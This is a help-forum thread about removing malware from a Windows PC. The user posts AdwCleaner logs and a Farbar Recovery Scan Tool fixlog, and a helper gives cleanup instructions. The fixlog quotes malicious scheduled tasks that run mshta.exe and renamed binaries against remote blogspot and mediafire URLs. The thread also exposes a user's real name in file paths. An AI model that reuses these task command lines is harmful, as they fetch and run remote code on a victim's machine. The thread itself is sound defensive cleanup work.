hostetler\appdata\local\temp\g2_2324\g2viewer.exe => No File FirewallRules: [TCP Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File FirewallRules: [UDP Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File FirewallRules: [TCP Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File FirewallRules: [UDP Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File FirewallRules: [TCP Query User{F907B127-94C2-47D0-9A7E-4B0B9EE01372}C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe => No File FirewallRules: [UDP Query User{FB10B806-8BB0-4FB9-A223-2B6AEF749C05}C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe => No File FirewallRules: [TCP Query User{90C1ECD6-3651-4A40-9E84-086E1F6B159E}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File FirewallRules: [UDP Query User{CD2CF4D2-6665-4D3B-9AAA-DDBB344E277C}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File FirewallRules: [TCP Query User{806E6120-074E-4858-A443-3CCE548E0FDD}C:\program files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla firefox\firefox.exe => No File FirewallRules: [UDP Query User{93BA9D74-3E49-4A0B-949F-4403A1FD2F07}C:\program files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla firefox\firefox.exe => No File C:\ProgramData\milon.com C:\ProgramData\ddond.com C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision C:\Users\Karin Hostetler\AppData\Local\mbam C:\Users\Karin Hostetler\AppData\Local\Temp C:\ProgramData\Temp C:\Users\Karin Hostetler\AppData\Roaming\*.tmp End:: * Click Fix * When completed the tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply. =================================================== Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. * Chrome notifications disabled? * AdwCleaner report * Fixlog Gary "Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God." Where to Start * Back to top -------------------------------------------------------------------------------- #5 KTAIT80 ktait80 * Topic Starter * * Members * 30 posts * ONLINE * Local time:02:27 PM Posted 24 March 2022 - 08:54 AM Chrome notifications have been disabled AdwCleaner logs" Adwcleaner[S00] # ------------------------------- # Malwarebytes AdwCleaner 8.3.1.0 # ------------------------------- # Build: 11-18-2021 # Database: 2022-03-15.3 (Cloud) # Support: https://www.malwarebytes.com/support # # ------------------------------- # Mode: Scan # ------------------------------- # Start: 03-24-2022 # Duration: 00:00:43 # OS: Windows 10 Home # Scanned: 32041 # Detected: 54 ***** [ Services ] ***** No malicious services found. ***** [ Folders ] ***** Adware.pokki C:\ProgramData\Host App Service Adware.pokki C:\Users\Default\AppData\Local\Host App Service Adware.pokki C:\Users\Karin Hostetler\AppData\Local\Host App Service Adware.pokki C:\Users\QBDataServiceUser26\AppData\Local\Host App Service Adware.pokki C:\Users\QBDataServiceUser27\AppData\Local\Host App Service Adware.pokki C:\Users\QBDataServiceUser28\AppData\Local\Host App Service Adware.pokki C:\Users\QBDataServiceUser29\AppData\Local\Host App Service Adware.pokki C:\Users\QBDataServiceUser30\AppData\Local\Host App Service Adware.pokki C:\Users\QBDataServiceUser31\AppData\Local\Host App Service Adware.pokki C:\Users\QBDataServiceUser32\AppData\Local\Host App Service Adware.pokki C:\Windows\ServiceProfiles\LocalService\AppData\Local\Host App Service Adware.pokki C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Host App Service PUP.Optional.Legacy C:\Users\Karin Hostetler\AppData\Roaming\download Manager ***** [ Files ] ***** Adware.pokki C:\Windows\System32\Tasks_Migrated\App Explorer ***** [ DLL ] ***** No malicious DLLs found. ***** [ WMI ] ***** No malicious WMI found. ***** [ Shortcuts ] ***** No malicious shortcuts found. ***** [ Tasks ] ***** Adware.pokki C:\Windows\System32\Tasks\APP EXPLORER ***** [ Registry ] ***** Adware.pokki HKCU\Software\App Host Service Adware.pokki HKCU\Software\Host App Service Adware.pokki HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service Adware.pokki HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FAA2F9C0-B1F9-43B8-A07F-477CD7F90A6A} Adware.pokki HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\App Explorer Adware.pokki HKU\S-1-5-19\Software\Host App Service Adware.pokki HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service Adware.pokki HKU\S-1-5-20\Software\Host App Service Adware.pokki HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service Adware.pokki HKU\S-1-5-21-1394640484-365018484-2708498470-1008\Software\Host App Service Adware.pokki HKU\S-1-5-21-1394640484-365018484-2708498470-1008\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service Adware.pokki HKU\S-1-5-21-1394640484-365018484-2708498470-1009\Software\Host App Service Adware.pokki HKU\S-1-5-21-1394640484-365018484-2708498470-1009\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service Adware.pokki HKU\S-1-5-21-1394640484-365018484-2708498470-1010\Software\Host App Service Adware.pokki HKU\S-1-5-21-1394640484-365018484-2708498470-1010\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service ***** [ Chromium (and derivatives) ] ***** No malicious Chromium entries found. ***** [ Chromium URLs ] ***** No malicious Chromium URLs found. ***** [ Firefox (and derivatives) ] ***** No malicious Firefox entries found. ***** [ Firefox URLs ] ***** No malicious Firefox URLs found. ***** [ Hosts File Entries ] ***** No malicious hosts file entries found. ***** [ Preinstalled Software ] ***** Preinstalled.HPUsageTrackingLEDM Folder C:\Program Files (x86)\HP\HP UT LEDM\BIN Preinstalled.HPUsageTrackingLEDM Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|HPUsageTrackingLEDM Preinstalled.HPUsageTrackingLEDM Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|HPUsageTrackingLEDM Preinstalled.HPUsageTrackingLEDM Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{853F464A-B2B8-404E-BA3E-B98FF6862C41} Preinstalled.LenovoFamilyCloud Folder C:\Program Files\LENOVO\LIVESTORAGE Preinstalled.LenovoFamilyCloud Folder C:\ProgramData\LENOVO\LIVESTORAGE Preinstalled.LenovoFamilyCloud Folder C:\Users\Karin Hostetler\AppData\Local\Temp\LENOVO\LIVESTORAGE Preinstalled.LenovoFamilyCloud Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{E3573BD4-2C6B-4436-921C-D15B9278A610} Preinstalled.LenovoFamilyCloud Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{E3573BD4-2C6B-4436-921C-D15B9278A610} Preinstalled.LenovoIMController Folder C:\ProgramData\LENOVO\IMCONTROLLER Preinstalled.LenovoIMController Folder C:\Users\Karin Hostetler\AppData\Local\LENOVO\IMCONTROLLER Preinstalled.LenovoIMController Folder C:\Windows\LENOVO\IMCONTROLLER Preinstalled.LenovoIMController Folder C:\Windows\System32\Tasks\LENOVO\IMCONTROLLER Preinstalled.LenovoIMController Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\Lenovo Dependency Package_is1 Preinstalled.LenovoPower2Go Folder C:\Program Files (x86)\LENOVO\POWER2GO Preinstalled.LenovoPower2Go Folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LENOVO\POWER2GO Preinstalled.LenovoPower2Go Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|CLMLServer Preinstalled.LenovoPower2Go Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|UpdateP2GoShortCut Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|CLMLServer Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|UpdateP2GoShortCut Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658} Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{40BF1E83-20EB-11D8-97C5-0009C5020658} Preinstalled.LenovoServiceBridge Folder C:\Users\Karin Hostetler\AppData\Local\PROGRAMS\LENOVO\LENOVO SERVICE BRIDGE Preinstalled.LenovoServiceBridge Registry HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1 ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ########## AdwCleaner[C00] # ------------------------------- # Malwarebytes AdwCleaner 8.3.1.0 # ------------------------------- # Build: 11-18-2021 # Database: 2022-03-15.3 (Cloud) # Support: https://www.malwarebytes.com/support # # ------------------------------- # Mode: Clean # ------------------------------- # Start: 03-24-2022 # Duration: 00:01:16 # OS: Windows 10 Home # Cleaned: 54 # Awaiting reboot:2 # Failed: 0 ***** [ Services ] ***** No malicious services cleaned. ***** [ Folders ] ***** Deleted C:\ProgramData\Host App Service Deleted C:\Users\Default\AppData\Local\Host App Service Deleted C:\Users\Karin Hostetler\AppData\Local\Host App Service Deleted C:\Users\Karin Hostetler\AppData\Roaming\download Manager Deleted C:\Users\QBDataServiceUser26\AppData\Local\Host App Service Deleted C:\Users\QBDataServiceUser27\AppData\Local\Host App Service Deleted C:\Users\QBDataServiceUser28\AppData\Local\Host App Service Deleted C:\Users\QBDataServiceUser29\AppData\Local\Host App Service Deleted C:\Users\QBDataServiceUser30\AppData\Local\Host App Service Deleted C:\Users\QBDataServiceUser31\AppData\Local\Host App Service Deleted C:\Users\QBDataServiceUser32\AppData\Local\Host App Service Deleted C:\Windows\ServiceProfiles\LocalService\AppData\Local\Host App Service Deleted C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Host App Service ***** [ Files ] ***** Deleted C:\Windows\System32\Tasks_Migrated\App Explorer ***** [ DLL ] ***** No malicious DLLs cleaned. ***** [ WMI ] ***** No malicious WMI cleaned. ***** [ Shortcuts ] ***** No malicious shortcuts cleaned. ***** [ Tasks ] ***** Deleted C:\Windows\System32\Tasks\APP EXPLORER ***** [ Registry ] ***** Deleted HKCU\Software\App Host Service Deleted HKCU\Software\Host App Service Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FAA2F9C0-B1F9-43B8-A07F-477CD7F90A6A} Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\App Explorer Deleted HKU\S-1-5-19\Software\Host App Service Deleted HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service Deleted HKU\S-1-5-20\Software\Host App Service Deleted HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service Deleted HKU\S-1-5-21-1394640484-365018484-2708498470-1008\Software\Host App Service Deleted HKU\S-1-5-21-1394640484-365018484-2708498470-1008\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service Deleted HKU\S-1-5-21-1394640484-365018484-2708498470-1009\Software\Host App Service Deleted HKU\S-1-5-21-1394640484-365018484-2708498470-1009\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service Deleted HKU\S-1-5-21-1394640484-365018484-2708498470-1010\Software\Host App Service Deleted HKU\S-1-5-21-1394640484-365018484-2708498470-1010\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service ***** [ Chromium (and derivatives) ] ***** No malicious Chromium entries cleaned. ***** [ Chromium URLs ] ***** No malicious Chromium URLs cleaned. ***** [ Firefox (and derivatives) ] ***** No malicious Firefox entries cleaned. ***** [ Firefox URLs ] ***** No malicious Firefox URLs cleaned. ***** [ Hosts File Entries ] ***** No malicious hosts file entries cleaned. ***** [ Preinstalled Software ] ***** Deleted Preinstalled.HPUsageTrackingLEDM Folder C:\Program Files (x86)\HP\HP UT LEDM\BIN Deleted Preinstalled.HPUsageTrackingLEDM Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|HPUsageTrackingLEDM Deleted Preinstalled.HPUsageTrackingLEDM Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|HPUsageTrackingLEDM Deleted Preinstalled.HPUsageTrackingLEDM Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{853F464A-B2B8-404E-BA3E-B98FF6862C41} Deleted Preinstalled.LenovoFamilyCloud Folder C:\Users\Karin Hostetler\AppData\Local\Temp\LENOVO\LIVESTORAGE Deleted Preinstalled.LenovoFamilyCloud Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{E3573BD4-2C6B-4436-921C-D15B9278A610} Deleted Preinstalled.LenovoFamilyCloud Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{E3573BD4-2C6B-4436-921C-D15B9278A610} Deleted Preinstalled.LenovoIMController Folder C:\ProgramData\LENOVO\IMCONTROLLER Deleted Preinstalled.LenovoIMController Folder C:\Users\Karin Hostetler\AppData\Local\LENOVO\IMCONTROLLER Deleted Preinstalled.LenovoIMController Folder C:\Windows\LENOVO\IMCONTROLLER Deleted Preinstalled.LenovoIMController Folder C:\Windows\System32\Tasks\LENOVO\IMCONTROLLER Deleted Preinstalled.LenovoIMController Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\Lenovo Dependency Package_is1 Deleted Preinstalled.LenovoPower2Go Folder C:\Program Files (x86)\LENOVO\POWER2GO Deleted Preinstalled.LenovoPower2Go Folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LENOVO\POWER2GO Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|CLMLServer Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|UpdateP2GoShortCut Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|CLMLServer Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|UpdateP2GoShortCut Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658} Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{40BF1E83-20EB-11D8-97C5-0009C5020658} Deleted Preinstalled.LenovoServiceBridge Folder C:\Users\Karin Hostetler\AppData\Local\PROGRAMS\LENOVO\LENOVO SERVICE BRIDGE Deleted Preinstalled.LenovoServiceBridge Registry HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1 Needs Reboot Preinstalled.LenovoFamilyCloud Folder C:\Program Files\LENOVO\LIVESTORAGE Needs Reboot Preinstalled.LenovoFamilyCloud Folder C:\ProgramData\LENOVO\LIVESTORAGE ************************* [+] Delete Tracing Keys [+] Reset Winsock ************************* ***** Reboot Required to Complete ***** ***** [ Folders ] ***** Cleaning failed C:\Program Files\LENOVO\LIVESTORAGE Cleaning failed C:\ProgramData\LENOVO\LIVESTORAGE ************************* AdwCleaner[S00].txt - [7144 octets] - [24/03/2022 08:58:48] ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ########## Fixlog Fix result of Farbar Recovery Scan Tool (x64) Version: 24-03-2022 Ran by Karin Hostetler (24-03-2022 09:38:07) Run:1 Running from C:\Users\Karin Hostetler\Desktop\Delete Loaded Profiles: Karin Hostetler & QBDataServiceUser27 & QBDataServiceUser26 & QBDataServiceUser28 & QBDataServiceUser29 & QBDataServiceUser30 & QBDataServiceUser31 & QBDataServiceUser32 Boot Mode: Normal ============================================== fixlist content: ***************** CreateRestorePoint: CloseProcesses: Folder: C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision Folder: C:\Users\Karin Hostetler\AppData\Local\mbam HKLM-x32\...\Run: [HPUsageTrackingLEDM] => "C:\Program Files (x86)\HP\HP UT LEDM\bin\hppusg.exe" "C:\Program Files (x86)\HP\HP UT LEDM\" (No File) HKLM-x32\...\Run: [MobisynapseSyncHelper] => C:\Program Files (x86)\Mobisynapse\MobisynapseSyncHelper.exe (No File) HKLM-x32\...\Run: [BYRUA_AGENT] => "C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe" -start (No File) HKLM-x32\...\Run: [DYMOWebApi] => "C:\Program Files (x86)\DYMO\DYMO Connect\DYMO.WebApi.Win.Host.exe" /auto (No File) HKLM-x32\...\Run: [DLSService] => "C:\Program Files (x86)\DYMO\DYMO Label Software\DLSService.exe" (No File) HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Run: [BYRUA_AGENT] => "C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe" -start (No File) Task: {058B7C2A-04F0-45DE-9627-9C6E7CCE7BA8} - System32\Tasks\asdsdasdjikindasddeyu => "C:\ProgramData\milon.com" [Argument = "https://mobnew1htmback.blogspot.com/atom.xml"] Task: {27302AB8-5990-4AC3-BEB6-CF5627D88D26} - System32\Tasks\calendersw => "C:\ProgramData\ddond.com" [Argument = "https://www.mediafire.com/file/b1rg1ah1ulmvcmq/00Back.htm/file"] Task: {4EBD398E-9E3B-4A48-8FF6-85D216BCAB3C} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION Task: {53FC2A34-956B-4691-8FCB-DA0D66138CBD} - System32\Tasks\asdaddddasdadsddasdeyu => "C:\Windows\System32\mshta.exe" "hxxps://mainnewstart1mob.blogspot.com/atom.xml" Task: {C897E049-5067-41C4-8F4C-CB5C6B419D54} - System32\Tasks\microWord => "C:\ProgramData\milon.com" [Argument = "https://mobnew1htmback.blogspot.com/atom.xml"] Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found] Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found] Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found] Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found] 2022-03-23 08:26 - 2022-03-23 07:55 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\myciaB..tmp 2022-03-23 08:26 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\B.mvKwd.tmp 2022-03-23 07:04 - 2022-03-23 05:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\Fkhvfuv.tmp 2022-03-23 07:04 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\IlxrjIs.tmp 2022-03-23 05:42 - 2022-03-23 05:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\.EipzDA.tmp 2022-03-23 05:42 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\FooEDIz.tmp 2022-03-23 04:55 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\ianksBp.tmp 2022-03-23 04:55 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\ljesr.e.tmp 2022-03-23 02:58 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\pAsnGil.tmp 2022-03-23 02:58 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\bvcozKc.tmp 2022-03-23 01:36 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\vacfsmG.tmp 2022-03-23 01:36 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\gelfCgB.tmp 2022-03-23 00:14 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\.DmrCyx.tmp 2022-03-23 00:14 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\uhhsnBd.tmp 2022-03-22 22:52 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\hdpl.A..tmp 2022-03-22 22:52 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\fhIqKrG.tmp 2022-03-22 21:30 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\h.dA..r.tmp 2022-03-22 21:30 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\pF.Fltn.tmp 2022-03-22 20:08 - 2022-03-22 19:54 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\jKsc.Db.tmp 2022-03-22 20:08 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\ymybaBG.tmp 2022-03-22 20:05 - 2022-03-22 19:54 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\abF.FyJ.tmp 2022-03-22 20:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\AfKprbo.tmp 2022-03-22 18:46 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\.gq.eEv.tmp 2022-03-22 18:46 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\Kjvon.z.tmp 2022-03-22 18:20 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\hc.Ekso.tmp 2022-03-22 18:20 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zmabqBm.tmp 2022-03-22 17:24 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\pddmtsw.tmp 2022-03-22 17:24 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\flwKCyx.tmp 2022-03-22 16:19 - 2022-03-23 08:05 - 000003754 _____ C:\WINDOWS\system32\Tasks\asdsdasdjikindasddeyu 2022-03-22 16:02 - 2022-03-22 15:31 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\GK.xB.H.tmp 2022-03-22 16:02 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hHKvy.s.tmp 2022-03-22 14:53 - 2022-03-22 14:53 - 000003770 _____ C:\WINDOWS\system32\Tasks\asdaddddasdadsddasdeyu 2022-03-22 14:53 - 2020-10-14 07:54 - 000452608 _____ (Microsoft Corporation) C:\ProgramData\timagar.com 2022-03-22 14:12 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\xbfAl.r.tmp 2022-03-22 14:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\DgkIlaH.tmp 2022-03-22 13:44 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\rGjizBd.tmp 2022-03-22 13:44 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\kawiKkt.tmp 2022-03-22 13:18 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\KAJdHsx.tmp 2022-03-22 13:18 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\kaampdk.tmp 2022-03-22 13:12 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin Hostetler\AppData\Roaming\c.pmfr..tmp 2022-03-22 13:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\FkyDzBg.tmp 2022-03-22 11:35 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\.yvbevo.tmp 2022-03-22 11:35 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\CqicpoE.tmp 2022-03-22 11:11 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\imec.rK.tmp 2022-03-22 11:11 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.wB.u.k.tmp 2022-03-22 10:40 - 2022-03-22 10:40 - 000000000 ____D C:\Users\Karin Hostetler\AppData\Local\mbam 2022-03-22 10:34 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\x.fkmhm.tmp 2022-03-22 10:34 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.AInoHs.tmp 2022-03-22 09:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\hHpH.vg.tmp 2022-03-22 09:12 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.Fixosu.tmp 2022-03-22 07:50 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\As.e.Iq.tmp 2022-03-22 07:50 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\u.vBKhg.tmp 2022-03-22 06:28 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\FHm.CCw.tmp 2022-03-22 06:28 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\G.zIGwn.tmp 2022-03-22 05:50 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\uebnfhx.tmp 2022-03-22 05:50 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\FqFql.I.tmp 2022-03-22 05:30 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\vowws.H.tmp 2022-03-22 05:30 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.BahC.h.tmp 2022-03-22 05:06 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zBllBya.tmp 2022-03-22 05:06 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\qcmJyrv.tmp 2022-03-22 04:04 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\BcvEhIh.tmp 2022-03-22 04:04 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\hKKAJt..tmp 2022-03-22 03:51 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\H.FnrcA.tmp 2022-03-22 03:51 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\FcfgK.l.tmp 2022-03-22 03:44 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\JBAeesf.tmp 2022-03-22 03:44 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\.yvkw.y.tmp 2022-03-22 03:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\GyhgfDG.tmp 2022-03-22 03:05 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\rGHtFCn.tmp 2022-03-22 03:00 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\pzvEJ.c.tmp 2022-03-22 03:00 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin Hostetler\AppData\Roaming\cxuionk.tmp 2022-03-22 02:22 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin Hostetler\AppData\Roaming\zatwfvJ.tmp 2022-03-22 